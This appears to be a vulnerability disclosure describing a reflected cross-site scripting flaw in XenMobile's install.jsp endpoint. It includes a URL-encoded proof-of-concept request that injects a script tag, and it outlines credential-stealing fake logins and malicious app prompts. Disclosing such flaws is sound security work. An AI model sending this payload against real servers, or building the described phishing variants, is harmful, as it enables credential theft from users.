XenMobile can be tricked into displaying content of the attacker’s choosing. This could allow an attacker to take over the contents of a web page displayed to a user, enabling them to steal credentials or run arbitrary javascript on the user’s browser.
The following request shows arbitrary content to a user: ~~~~ https://target/zdm/dynamictp/install.jsp?payload=%7b%22%74%79%70%65%22%3a%22%22%2c%22%70%6c%69%73%74%55%72%6c%22%3a%22%22%2c%22%69%70%61%5f%75%72%6c%22%3a%22%5c%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c%2f%73%63%72%69%70%74%3e%22%2c%22%69%6d%61%67%65%5f%66%75%6c%6c%22%3a%22%22%2c%22%69%6d%61%67%65%5f%64%69%73%70%6c%61%79%22%3a%22%22%2c%22%62%75%6e%64%6c%65%5f%69%64%65%6e%74%69%66%69%65%72%22%3a%22%22%2c%22%62%75%6e%64%6c%65%5f%76%65%72%73%69%6f%6e%22%3a%22%22%2c%22%74%69%74%6c%65%22%3a%22%22%7d ~~~~
This vulnerability could be used to display a fake login page, designed to look exactly like the legitimate one, but with modifications allowing us to steal user credentials.
Because it is possible to execute javascript, this vulnerability could also be used to redirect users to another location or to prompt them to install an application of an attacker’s choosing on their mobile device via XenMobile’s designed functionality.